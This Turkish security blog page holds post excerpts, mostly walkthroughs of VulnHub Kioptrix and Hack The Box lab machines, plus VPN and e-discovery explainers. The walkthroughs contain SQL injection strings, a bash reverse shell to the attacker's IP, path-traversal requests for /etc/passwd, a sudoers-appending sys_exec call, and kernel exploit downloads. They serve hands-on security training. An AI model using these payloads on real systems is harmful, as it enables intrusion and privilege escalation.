Navigasyonu değiştir
KernelBlog
Touch The Technology
İçeriğe geç
Anasayfa
Hakkımızda
Siber Güvenlik
Röportajlar
Diğer
Bilim
Yazılım
Araç Tanıtımı
Raspberry – Arduino
Linux
Windows
Mobil
Android
IOS
Projelerimiz
Siber Sözlük
Felis
YouTube
English
Teknoloji'ye Dair Her şey
Hakkımızda
Son Yazılarımız
Daha Fazlası İçin Takipte Kalınız.
Sızma Testi Örnekleri:Kioptrix Level 4
Mayıs 22, 2020
Siber Güvenlik
Serinin devamında kioptrix‘in 4. makinesini inceleyeceğiz. Açıkçası öncekilerinden seviye olarak pek bir farkı yok bu arkadaşın fakat privesc açısından diğerlerinden biraz farklı 😉 Her zaman ki gibi işe makinenin ip adresini bulmayla başlayalım. Bunun için Netdiscover kullanıyorum. Nmap ile hem script taraması yapıp hem de hangi portlarda hangi servisler çalışıyor ona bakalım şimdi de. nmap -sSV -p 22,80 –script=vuln 192.168.42.131 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 12:19 AKDT Nmap scan report for 192.168.42.131 Host is up (0.00011s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | vulners: | cpe:/a:openbsd:openssh:4.7p1: | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755 |_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.131 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.42.131:80/ | Form id: myusername | Form action: checklogin.php | | Path: http://192.168.42.131:80/checklogin.php | Form id: | Form action: index.php | | Path: http://192.168.42.131:80/index.php | Form id: myusername |_ Form action: checklogin.php |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /database.sql: Possible database backup | /icons/: Potentially interesting folder w/ directory listing | /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch' |_ /index/: Potentially interesting folder |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack Bu çıktı bize bilmemiz gereken herşeyi söylüyor aslında.Hemen webden ilerleyelim.Hedef makineye 80.porttan baktığımızda bizi şöyle bir sayfa karşılıyor. Nmap çıktısında gördüğünüz gibi database.sql dosyasının olduğunu söylüyor.Kesin birşeyler vardır deyip ona da bakıyorum. John isimli bir kullanıcının parolasının 1234 olduğunu görüyorum ama bu kadar kolay olmamalı değil mi ? Evet bu kadar kolay olsaydı şaşardım.Fakat nedense içimden bir ses sqli var diyor.Kullanıcı adını john parolayı ise ‘or’1 olarak girdiğimde giriş yapıyorum. Peki burda çıkan parola ne alaka ? Sevgili dostlar öğrendiğim bir şey varsa o da bulduğum bütün parolaları her yerde denemek.Bu yüzden öncelikle ssh denemesi yapıyorum.Beni Libgoat Shell karşılıyor.Görüldüğü üzere hiçbir komut işe yaramıyor. Help diyerek neler yapabildiğime baktığımda echo komutunu çalıştırabildiğimi görüyorum.Bu komut ile interaktif shell e geçebilirim; echo os.system(“/bin/bash”) Pekala şimdi sıra geldi hak yükseltmeye. Öncelikli olarak suid bit ayarlı dosyalara bakalım işe yarar bir şey var mı ? find / -perm -u=s -type f 2>/dev/null İşe yarar birşeyler çıkmadı.Sudo komutu ile hangi programları çalıştırabileceğime de bakayım dedim ama kullanıcı sudoers dosyasında değilmiş. Hmm. Makinede dolaşırken /var/ww dizinine de bi bakayım dedim.Sonuçta site dosyaları var.robert dizini dikkatimi çekti. cat ile robert.php dosyasına baktığımda mysql bilgileri kabak gibi duruyordu önümde. İyi hoş belki mysql ile root olabiliriz ama önce ps komutu ile root yetkileriyle çalışıp çalışmadığına bakalım. ps auxf | grep mysql Çok güzel şimdi işe koyulma vakti.mysql e girdikten sonra hangi fonksiyonları çalıştırabileceğimizi görelim şu komutçuk ile; select * from mysql.func; Ne görelim sys_exec fonksiyonunu çalıştırabiliriz.İsminden de anlayacağınız gibi bu abimiz komut çalıştırmamızı sağlıyor.Sudoers dosyasına adımızı altın harflerle yazarsak bu iş tamam demektir.(Mysql de hak yükseltmenin başka yolları da var tabiki örneğin lib_mysqludf_sys.so dosyası ile de yapabilirdik fakat madem sys_exec fonksiyonunu çalıştırabiliyoruz o zaman gereksiz uğaşa girmeyelim değil mi?) select sys_exec(‘echo “john ALL=(ALL) ALL” >> /etc/sudoers ‘); Başarıyla sudoers dosyasına yazdık.Şimdi root olma vakti. Görüldüğü üzere root olmayı başardık.Son olarak bir de /root/ dizini altında işi bitirdiğimizi söyleyen congrats.txt var ona da göz ucundan bakalım 🙂...
[HTB] OpenAdmin WriteUp (10.10.10.171)
Mayıs 11, 2020
Siber Güvenlik
Uzun zamandan sonra selamlar dostlar. Bu yazımda Hack The Box üzerinde bulunan OpenAdmin makinasının çözümüne değineceğim şimdiden iyi okumalar. Makinamızın ip adresi 10.10.10.171. Şimdi gelin bir nmap taraması yapalım ardından makinanın açık portlarına ve bu portların üzerinde çalışan servislere bir göz atalım. 80 ve 22 portları açık olarak gözüküyor. İkisinin de üzerinde çalışan servisler güncel yani bir exploit bulamayız gelin 80 portunda yani webserverda ne varmış bakalım. Apache’nin default web sayfası var. Ancak burada direk akla gelen bir şey var o da dizinleri dirb veya dirbuster ile taramak. Dirbuster’ı çalıştırdık ve /ona/ diye bir dizin bulduk. Bu dizine girelim ve içeride ne var bakalım. Evet ona dizininde çalışan bir yazılım var. Ancak gördüğünüz gibi versiyonu eski. Bundan faydalanabiliriz. İnternette bu versiyonun bir exploitini bulduk. Tam istediğimiz gibi uzaktan kod yürütmemizi sağlıyor. Bu exploit sayesinde içeriye sızabiliriz. Ancak ben bu exploiti sh olarak çalıştırmak istemiyorum bunu bir python scriptine dönüştüreceğim. O scripte de buradan ulaşabilirsiniz. Scriptimi çalıştırdım ardından “ls –la” komutumu yazdım ve sunucudaki dosyaları artık görebiliyorum. Gözüme direk config dosyaları çarpıyor. Biraz dizinleri gezeyim ve config dosyalarında neler varmış bakayım. config dizininin altındaki config.inc.php dosyasını okudum ve dosyanın içerisindeki bir kısım dikkatimi çekti. Bu satırda database_settings.inc.php adında bir dosya ve bu dosyanın hangi dizinde olduğunu görüyoruz. Şimdi gidip o dosyayı bulup okuyalım. Şöyle bir şifre bulduk. Şimdi hatırlarsanız 22 portu yani ssh portu açıktı. Bu bulduğumuz şifre herhangi bir kullanıcıya ait olabilir ve bu şifreyle o kullanıcıya ssh ile bağlanabiliriz. Sistemdeki kullanıcıları görmek için “cat /etc/passwd” komutunu çalıştırıyoruz. Sistemde root dışında iki adet kullanıcı var. Jimmy ve joanna kullanıcıları. Şimdi gelin ssh üzerinden bu kullanıcılara bulduğumuz şifre ile bağlanmayı deneyelim. Şifre Jimmy adlı kullanıcıya aitmiş artık içeride Jimmy kullanıcısı olarak işlem yapabiliriz. Ancak aklıma şöyle bir şey geldi. Az önce scriptte dizinleri gezerken /var/www/ dizininin altında farklı klasörler de vardı. Onları incelemeye karar verdim. /var/www/ dizininin altında html dizini dışında internal dizini de var. Ve içinde 3 adet dosya var. Şimdi bu dosyaların içini “cat” ile okuyorum. main.php dosyasının içinde benim tam da aradığım şey var. Bir kullanıcıya ssh ile bağlanmak için o kullanıcının private key’ine ve passphrase key’ine sahip olmam yeterli. Benim bu dosyaya “curl” ile istek atmam gerekiyor. Ama burada şöyle bir durum var şimdi ben tarayıcıya http://10.10.10.171 yazdığımda /var/www/html dizininin altındakileri gösteriyor ancak bu dosya /var/www/internal dizininin altında. Bu noktada bilgi toplamaya devam etmemiz gerekiyor. Bakmamız gereken yer apache’nin config dosyalarının bulunduğu dizin. Bu dizinde /etc/apache2/sites-available/internal.conf dosyası bulunuyor onu okuyalım. İnternal klasörüne erişimin yalnızca yerel olarak mümkün olduğunu görüyoruz. Yani yapmamız gereken işlem curl ile http://localhost:52846/main.php ye istek atmak. Evet isteğimi attım ve hop joanna kullanıcısının private keyi artık bende. Ancak direk sadece private key ile bağlanamam. Bu private keyi kendi bilgisayarımda Masaüsatünde joanna_rsa dosyası olarak kaydediyorum. Şimdi joanna_rsa adlı dosyayı ssh2john.py scriptiyle hash haline çevirmem gerekiyor. Ardından da çevirdiğim hash’i “John the Ripper” ile bruteforce kullanarak kırmam gerekiyor. Hemen bu iki işlemi de yapıyorum. Hash dosyamın içerisindeki şifrelemeyi rockyou.txt wordlistiyle kırdım. Ve sonuç olarak “bloodninjas” çıktısını aldım. İşte şimdi joanna kullanıcısına ssh ile bağlanabilirim. Hemen bağlantıyı gerçekleştirelim. Bir kullanıcıya private key ile bağlanırken –i ile private keyin bulunduğu dosyayı vermelisiniz. Ardından sizden passphrase key ister ve bizim kırarak bulduğumuz “bloodninjas” burada passphrase keyimiz. Joanna kullanıcısına ssh ile bağlantımızı tamamladık hatta hemen user flagi de okuduk. OpenAdmin Own User aşamasını bitirdik. Şimdi bizim bu makinada root olmamız gerekiyor ancak nasıl? Hemen cevabı vereyim. İlk denememiz gereken şey sudo –l komutu. Hemen deneyelim. “sudo –l” komutu bize “sudo” komutunu şifre istemeden nerelerde kullanabileceğimizi söyler. Burada gördüğümüz ise şu. Biz nano’yu /opt/priv dosyasını okumak için sudo ile çalıştırdığımızda bizden bir şifre istemeyeceğini söylüyor. Hemen deneyelim. Evet dosyamızı “sudo /bin/nano /opt/priv” komutumuzla açtık. Bu dosyanın içi boş ancak bunun bir önemi yok şu an nanoyu root olarak açmış olduk yani istediğimiz her dosyayı rahatlıkla okuyabiliriz. Yetkimiz var. Hemen “ctrl+r” tuş kombinasyonuyla farklı bir dosyayı nanodan çıkış yapmadan içeri aktarıyoruz. Bize lazım olan dosya /root/ dizininin altındaki root.txt dosyası ve dosyanın yolunu yazarak içeri aktarıyoruz. Ve root flag’i de artık elimizde. OpenAdmin Own Root aşamasını da bitirmiş olduk ve artık OpenAdmin makinasına komple sızma işlemi bitmiş oldu. Herkese iyi çalışmalar…...
VPN Nedir, Çeşitleri Nelerdir ?
Mayıs 8, 2020
Diğer
VPN Nedir ? Virtual Private Network olarak bilinen Türkçe karşılığı “Sana Özel Ağ” teriminin kısaltılmış olan VPN en basit anlatımda fiziksel olarak dahil olmadığımız bir konumdaki ağa bağlantı kurmamızı sağlarlar. VPN Nasıl Çalışır? Kendi cihazınız ile bağlantı kurmak istediğiniz ağ arasında farklı şifreleme sistemlerine sahip protokoller ile şifreli bir bağlantı kurulmasını sağlayarak kripto anlamında bir tünel açar ve tüm veri giriş ve çıkışını şifreler. 3. Kişiler veya internet servis sağlayıcınız tarafından takip edilemez .Birçok vpn türü var farklı protokoller hepsini yazımızın devamında tüm detayları aktaracağız. VPN Protokol Türleri VPN protokolleri temelde iki tanedir aslında konuya genelde baktığımızda bunlar ; IPSec SSL IPSec VPN Nedir ? Büyük firmalar ,kurumlar farklı lokasyondaki şubelerini network anlamında birbirlerine bağlayarak bir ileşim altyapısı oluşturmak için ilk başlarda Leased-Line adı verilen bi yöntem kullanılıyordu ancak bu oldukça maliyetliydi.Ardından firmalar lokasyonlarını birbirlerini bağlayabilmek için IPSec VPN geliştirildi.Nasıl çalışır ? Merkez lokasyonda bulunan firewall , gateway gibi cihaz ile diğer lokasyondaki cihaz arasında şifreli tünel oluşturur ancak kişisel cihaz veya mobil cihaz desteği yoktur. SSL VPN Nedir ? Bu karantina süreçlerindede firmaların özellikle kullanyama başladığı vpn protokollerinden biridir. Günlük hayatımızda son kullanıcılarında kullandığı normal vpn olarak bildiğimiz SSL VPN‘dir. Ne gibi artıları vardır ? Kullanım kolaylığı Uzaktan erişim kolaylığı Mobil cihaz desteği SSL VPN Türleri SSL VPN kendi içinde farklı protokollerden oluşmaktadır . Bunlar ; PPTP(Point to point tunnelling protocol) Windows için özel çıkartılmış olup bağlantı kurulması için kullanıcı adı ve şifre ile bağlantı kurabilirsiniz.En düşük şifreleme sistemi pptp’dir . Avantajları -Hızlıdır . -Kurulumu kolay. Dezavantajları -Tamamen güvenli değildir -NSA tarafından gizliliği ihlal edilmiştir. IKEv2 (Internet Key Exchange Version 2) Hepimizin duymuş olabileceği firmalardan olan Cisco ve Microsoft tarafından geliştirilmiştir . Anti-Dos özelliği vardır. Avantajları -Blackberry cihazlarını destekler. -Diğer protokollere göre daha hızlıdır. -Kurulumu kolay Dezavantajları -Sınırlı platorm desteği L2TP(Layer 2 Tunneling Protocol) İki farklı kaymanda çalışan bu protokol 2058 bit şifreleme yapabiliyor.Ancak bunun bir dejavantajı var şifreleme bu kadar güçlü olunca hızda da ciddi anlamda düşüyor. Avantajları -Kurulumu kolay. -Güvenli kabul edilir Dezavantajları -Kısıtlayıcı firewall ile kullanıldığından problem çıkarabilir -Yavaş SSTP(Secure Socket Tunneling Protocol) Microsoft tarafından geliştirilmiş .SSL/TLS şifreleme yöntemi kullanılır . Avantajları –Winows için tamamen entegredir-Microsof desteği vardır-Güvenik seviyesi şifrelemeye bağlıdır, genellikle güvenli sayılır Dezavantajları -Windows’a özgündür...
Sızma Testi Örnekleri:Kioptrix Level 3
Nisan 29, 2020
Siber Güvenlik
Kioptrix level 2 den birazcık daha zor ama oldukça zevkli ve düşündürücü oldu benim için. Birkaç yeni bilgi edindim bu makine sayesinde. Sizlerinde öğreneceğinizi tahmin ediyorum. Lafı uzatmadan başlayalım. Sızma Testi Örnekleri:Kioptrix level 1Sızma Testi Örnekleri:Kioptrix Level 2 Kioptrix Level 3 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ İlk olarak netdiscover ile hedef makinenin ip adresini bulalım. netdisover -r 192.168.0.0/16 Nmap ile makineyi detaylı tarama yaptığımızda aslında bilmemiz gereken çoğu şeyi gösteriyor bize nmap -sS -p- 192.168.42.55 -n –script=vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 11:20 AKDT Nmap scan report for 192.168.42.55 Host is up (0.00039s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh |_clamav-exec: ERROR: Script execution failed (use -d to debug) 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.55 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.42.55:80/gallery/ | Form id: | Form action: login.php | | Path: http://192.168.42.55:80/index.php?system=Admin | Form id: contactform | Form action: index.php?system=Admin&page=loginSubmit | | Path: http://192.168.42.55:80/index.php?system=Blog&post=1281005380 | Form id: commentform | Form action: | | Path: http://192.168.42.55:80/gallery/index.php | Form id: | Form action: login.php | | Path: http://192.168.42.55:80/gallery/gadmin/ | Form id: username | Form action: index.php?task=signin | | Path: http://192.168.42.55:80/index.php?system=Admin&page=loginSubmit | Form id: contactform |_ Form action: index.php?system=Admin&page=loginSubmit |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /phpmyadmin/: phpMyAdmin | /cache/: Potentially interesting folder | /core/: Potentially interesting folder | /icons/: Potentially interesting folder w/ directory listing | /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch' |_ /style/: Potentially interesting folder | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ | http-sql-injection: | Possible sqli for queries: | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=loginSubmit%27%20OR%20sqlspider&system=Admin | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider | http://192.168.42.55:80/index.php?page=index%27%20OR%20sqlspider |_ http://192.168.42.55:80/index.php?page=loginSubmit%27%20OR%20sqlspider&system=Admin |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) MAC Address: 08:00:27:67:96:F9 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 323.17 seconds Kioptrix Level 3 WEB Webden ilerlemeden önce kioptrix makinesinin giriş ekranındaki bilgiyi ciddiye almakta fayda var. etc dizini altında bulunan hosts dosyasına gereken ayarı yapalım. nano /etc/hosts Şimdi web üzerinden ilerleyebiliriz.Bizi şöyle bir web sayfası karşılıyor. Giriş sayfasındaki yazının en altında bulunan “now” bağlantısına tıklıyorum ve eğlenceli bir sayfa çıkıyor karşımıza. Size eğlenceli ve masum gelebilir ama sayfanın sol altında bulunan butonda sıralamayla oynadıktan sonra URL kısmında tehlikeyi hissedebilirsiniz 🙂 id kısmına ufak bir tırnak herşeyi mahvedebilir. Şimdi sqlmap ile kolay bir şekilde kritik bilgilere ulaşabiliriz. sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” –dbs gallery veritabanına girelim ve tablolara göz atalım. sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” -D gallery –tables Kullanıcı bilgilerinin burda olduğu aşikar.Dump edelim sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” -D gallery -T dev_accounts –dump İhtiyacımız olan tam da buydu.Şimdi ssh ile devam edelim bakalım bilgiler işe yarayacakmı. ssh loneferret@kioptrix3.com Bulunduğum dizinde “CompanyPolicy.README” isimli bir dosya var.İçinde ht editörü sudo ile açmamı istediği yazıyordu. “sudo -l” komutu ile baktığımda şifresiz olarak ht editörü açabileceğimi gördüm.Bu bizim için çok iyi bir haber. Tabi ht editörü açmam için environment değerini değiştirmem gerekecek. echo $TERM export TERM=xterm-color sudo ht ht editörü ile etc dizini altında bulunan sudoers dosyasını açıp ufak bir değişiklik ile root olabiliriz.Ht editörde dosya açmak için F3 tuşuna basın ve dosya yolunu girin. loneferret kullanıcısına şifresiz çalıştırabileceği yeni path olarak /bin/sh girersek root olabiliriz.(virgül koymayı unutmayın ) F2 ile kaydedip çıkalım. sudo -l komutu ile tekrar kontrol ettiğimde şifresiz olarak çalıştırabileceğimi görüyorum.Ve sonuç .. /root dizini altında bulunan Congrats.txt dosyasını okuyup bitirebiliz. Ama daha da ilerleyebiliriz bence. Web sayfasında gezinirken url kısmına gözüm çarptı ve lfi olabileceğinden şüphelendim.Haklıydımda./etc/passwd dosyasını okuyabildim. Ilgili zafiyet: http://vulnerable_host/preview.php?file=../../../../etc/passwd%00 http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg Aynı zamanda anasayfada menüde bir de login vardı.Girdiğimde karşıma şöyle bir login ekranı çıktı ve bilin bakalım aşağı ne yazıyordu ? Sızma testi örnekleri serisinin ilk yazısında lotuscms in nasıl sömürüleceğinden bahsetmiştim.Aynen devam. use exploit/multi/http/lcms_php_exec set RHOSTS kioptrix3.com set URI / exploit İnteraktif shell e geçmek için ; shell python -c “import pyt;pty.spawn(‘/bin/bash’)” Son olarak nikto ile tarama yaptığımda ve tabi nmap sonucunda da çıktığı üzere phpmyadmin vardı. makinede /www/kioptrix3.com/gallery dizini altında bulunan gconfig.php yi açtığımda phpmyadmin giriş bilgilerini elde ettim. Phpmyadmin e girip bilgileri kullandığımda başarılı oldum....
Sızma Testi Örnekleri:Kioptrix Level 2
Nisan 23, 2020
Siber Güvenlik
Kioptrix serisinin ikinci yazısında ilk makine kadar kolay olmasa da kolay sayılabilecek level 2 makinesinin çözümünü anlatacağım. Bu makinenin çözümü ilkine göre daha zevkli ve öğretici. Kioptrix level 2 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ Herzaman ki gibi işe makinenin ip adresinin bulmakla başlayalım.Bunun için netdiscover kullanacağım. netdiscover -r 172.20.0.0/16 Nmap taraması ile hangi portların açık olduğuna bir bakalım. nmap -sS -sV -p- 172.20.10.2 -n İlk önce web uygulamasına bakalım.Karşımıza böyle bir giriş ekranı çıkacak. Birkaç giriş (admin-admin, admin-root) denemem işe yaramadı.sonra sql injection varmı diye kontrol ettim ve giriş yapmayı başardım. ‘or’kb’=’kb Karşımıza böyle bir ekran çıktı ve bize ping atılacak makineyi soruyor.Böyle şartlarda code execution aramak gerekir. ;ls Code execution olduğu aşikar 🙂 beni pingit.php ye yönlendirdi ve dizindeki dosyaları listeledi. Madem codex var o zaman reverse shell alalım ne duruyoruz.Ping atma inputuna şu komutçuğu girerek kendi makinemize (172.20.10.4) 7777.porttan istek atıyoruz Ve bu sırada nc ile bu portu dinliyoruz. ; bash -i >& /dev/tcp/172.20.10.4/7777 0>&1 nc -lvp 7777 Gördüğünüz gibi shell almayı başardık.Şimdi sıra hak yükseltmede.Bunun için bulunduğum dizine bir bakıyorum Ve index.php olduğunu görüp cat ile içine bakıyorum.İçinde bizim için önemli olabilecek bir bilgi var.Mysql bağlantısı yaptığı kullanıcı adı ve şifresi. Aynı şekilde bu bilgilerin sistem kullanıcı adı ve parolası olabileceğini düşünüp deniyorum.Tabi işe yaramadı. Bu bilgilerle mysql e bağlanıp kritik bilgilerin olup olmadığına bakalım. mysql -u john -p show databases; webapp veritabanına girip kullanıcılara bakalım. use webapp; show tables; select * from users; Bu bilgileri ssh bağlantısı yapıp kullandım fakat işe yaramadı.Pekala şimdi hak yükseltmemiz gerek.Root haklarına sahip olmak için gerekli exploit bilgisini çoğu zaman ben exploit suggester dan alıyorum.Exploit suggester ı makineye indirmek için kendi makinemde python ile bağlantı açıyorum ve hedef makineden wget ile suggester ı çekiyorum. Kendi makinemde ; python -m “SimpleHTTPServer” 8081 Hedef makinede; wget 172.20.10.4:8081/les.pl Exploit suggester ı çalıştırdıktan sonra çıkan exploitler bir işe yaramadı. Ama çekirdek bilgisini searchsploit de aradıktan sonra işe yarar güzel bir exploit buldum. searchsploit -w linux kernel 2.6 Exploiti -m parametresi ile bulunduğum dizine kopyalıyorum ve tekrardan bağlantı açıyorum. searchsploit -m exploits/linux_x86/local/9542.c python -m “SimpleHTTPServer” 4433 wget ile hedef makineye indirip çalıştırdığımda root haklarına sahip olmuş oluyorum. 🙂 wget 172.20.10.4:4433/9542.c gcc 9542.c -o exploit chmod 755 exploit ./exploit Sızma Testi Örnekleri:Kioptrix level 1...
E-KEŞİF
Nisan 19, 2020
Siber Güvenlik
Merhaba sevgili Kernelblog takipçileri. Bu yazımda sizlere e-keşif nedir, nasıl yapılması gerektiğinden bahsedeceğim. E-keşif (e-discovery) 1990’lı yılların başlarında ortaya çıkan adli bilişimden ayrılamaz bir parçadır daha da genişletmek gerekirse bilişim suçlarından, bilişimden ayrı düşünülemez. E-keşif elektronik ortamda işlenen suçlarda yürütülen hukuk davalarındaki keşif süreci olarak tanımlanabilir. Delilleri ortaya çıkarma, koruma, olay yeri müdahalesi ve olay yeri güvenliği hakkında olası dijital delilleri toplamayı ve incelemeyi sağlar. Bir hukuk davasında elektronik ortamda kaydedilmiş verilerin belirlenmesi; bu veriler e-postalar, sunumlar, veri tabanları, sesli mesajlar, resim dosyaları, ses ve video dosyaları, sosyal medya ve hatta web sitelerini dahil etmek mümkündür. Özetle sunucu, veri tabanı, e-mail sunucusu, vb. dijital olarak depolanabilen ve adli kanıt olarak kullanılabilecek verileri toplama, tanımlama ve raporlama çözümüdür. E-keşif dinamik bir yapıya sahiptir. Çünkü veriler her dakika biraz daha artıyor ve bu verilerin çokluğundan ve içerdikleri dosya bilgileri, dosya özellikleri, zaman bilgileri, meta verilerinden dolayı kompleks bir yapıya sahiptir. Orijinal içeriğin ve elektronik olarak saklanan verilerin, meta verilerinin korunması da devam eden dava sürecinde delillerin güvenliği açısından gereklidir. Verilerin tespit edilip, toplanma, ayıklanma ve endeksleme işlemlerinden sonra belgeler değiştirilemez, silinemez veya başka bir şekilde imha edilemez şekilde bir veri tabanına yerleştirilir. Bu noktada, açık olmayan ilgili belgeleri ve e-postaları ayıklamak veya ayrıştırmak için veriler analiz edilir ve güvenli bir ortamda muhafaza edilir. E-Keşif bünyesinde 4 adet farklı data bulunmaktadır. Bunlar; Aktif(Öz)KopyaArşivArtık Aktif Data: Aktif datalar harddisk veya ağ sunucularından kolayca bulunabilen datalardır. Kopya: Kopya dataların diğer adı dosya klonudur. Bu tip dataların kurtarılması genellikle maliyetlidir. Arşiv: Arşiv datalar, yedekleme disklerinde bulunan datalardır ve kolay kullanılabilir formatta değildirler. Kurtarılmaları ve kullanılmaları için özel program gereklidir ve mutlaka bir uzmana ihtiyaç vardır. Artık: Artık datalar ise hayalet dosyalar olarak da adlandırılabilirler. Bu datalar üzerine herhangi bir belge yazılmamış ya da wipe edilmemiş kaydedildikleri yerde duran datalardır. E-keşif Yasal Süreci E-keşif uygulamaları dijital kanıtların mahkemede sunulduğu zamana kadar bir dava öngörüldüğü andan itibaren çalışır. Bu süreçte veriler iki tarafın avukatları tarafından uygun olarak tanımlanır ve yasal beklemeye alınır. Sonrasında keşif kapsamı belirlenir, istekler ve zorunluluklar yapılır. Neyin arandığını tespit etmek ve gerekli delillerin belirlenmesi, arama parametreleri, gözden geçirmek için rakip bir danışmandan veya denetçiden de görüşler alınır. Sonrasında bulunan deliller dijital adli prosedürler kullanılarak çıkarılır, analiz edilir ve mahkemede sunulmak üzere pdf veya tiff formatında raporlanır. Hukuki bir süreçte en iyi çözüm harekete geçmeden önce hazırlık yapmaktır. Bu yüzden adli bilişim incelemelerinden önce suça dayalı özelleştirilmiş e-keşifler yapılmalıdır. Bir sonraki yazımda görüşmek dileğiyle. İyi Okumalar....
Sızma Testi Örnekleri:Kioptrix level 1
Nisan 16, 2020
Siber Güvenlik
VulnHub da denk geldiğim ve başlangıç seviyesi için oldukça uygun bir boot to root makinesinin ne tür zafiyetleri olduğu ve bu zafiyetlerin nasıl sömürüleceğini anlatacağım bu yazıda umarım size bir şeyler katabilirim. Amacımız makineyi istismar edip root dosyasını okumak.İsterseniz kioptrix makinesinin çözümüne başlayalım. Kioptrix indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ Kurulumda sıkıntı yaşamamak için şuna bir göz atın: https://www.hypn.za.net/blog/2017/07/15/running-kioptrix-level-1-and-others-in-virtualbox/ İşe makinenin ip adresini bulmakla başlayalım.Arp-scan ile makinemizin ip adresini buluyoruz. sudo arp-scan –interface=eth1 –localnet Şimdi nmap taraması yapalım ve hangi portlarda hangi servisler çalışıyor ona bakalım. sudo nmap -sS -sV -T4 -n -p- 172.20.10.2 80.Port MOD_SSL Zafiyeti Dikkatinizi çektimi bilmiyorum ama 80.portta çalışan apache de banner bilgisi olarak mod_ssl versiyonu çıktı.Searchsploit ile buna bir bakalım. searchsploit mod_ssl İşimize yarar üç farklı exploit çıktı.İsimleri de pek havalı 🙂 OpenFuck exploitinin son çıkanını kullanacağım.Sorun istemiyorum. PATH kısmında 47080.c olan yani. Bir önceki yazımda da searchsploit kullanımını anlatmıştım.Şimdi bu exploti -m parametresi ile bulunduğumuz konuma getirelim. searchsploit -m exploits/unix/remote/47080.c exploite kısa bir bakış atmak ve bilgi almak için nano ile açalım. Nasıl derlememiz gerektiğini söylemiş arkadaş o zaman derleyelim bakalım. gcc 47080.c OpenFuckV2 -lcrypto ./OpenFuckV2 Exploiti derleyip çalıştırdıktan sonra nasıl kullanacağımı gösteriyor iyi hoş ama target box dediği ne ? Birazcık aşağılara inip nmap çıktısından hedef makinenin apache versiyonu bilgisini kullanarak target box kısmını doldurabiliriz. Bu ikisinden birini kullanabiliriz.Ben 0x6b yi kullanacağım. Port bilgisini 443 olarak girip -c parametresi ile de 40 – 50 arası bağlantı sayısını belirtip exploiti başlatıyorum.Bu arada exploitin güzel bir yanıda şu otomatik olarak hak yükseltme saldırısı yapıyor yani uğraşmadan root oluyoruz gördüğünüz gibi. ./OpenFuckV2 0x6b 172.20.10.2 443 -c 40 Artık root olduğumuza göre root dosyasını okuyabiliriz. cat root Başarılı olduğumuzun kanıtı 🙂 139.Port SMB Zafiyeti Tabiki de tek yol mod_ssl değil merak edip smb ye de uğradım.Nmap ile detaylı bi tarama yaptım çünkü mutlaka bir zafiyet vardır bu arkadaşta.Yanılmadım da. nmap -sS -sV –script=vuln -p 139 172.20.10.2 İlgili exploit metasploitte bulunmasına rağmen işe yaramadı bu yüzden Öncelikle SMB versiyonunu bulalım.Bunun için metasploitte bulunan smb_version modülünü kullanacağım. use auxiliary/scanner/smb/smb_version set RHOSTS 172.20.10.2 exploit SMB versiyonunu bulduktan sonra searchsploit ile exploit arıyorum ve bulunduğum dizine kopyalıyorum. searchsploit -w samba 2.2 exploiti derledikten sonra nasıl çalıştığıyla 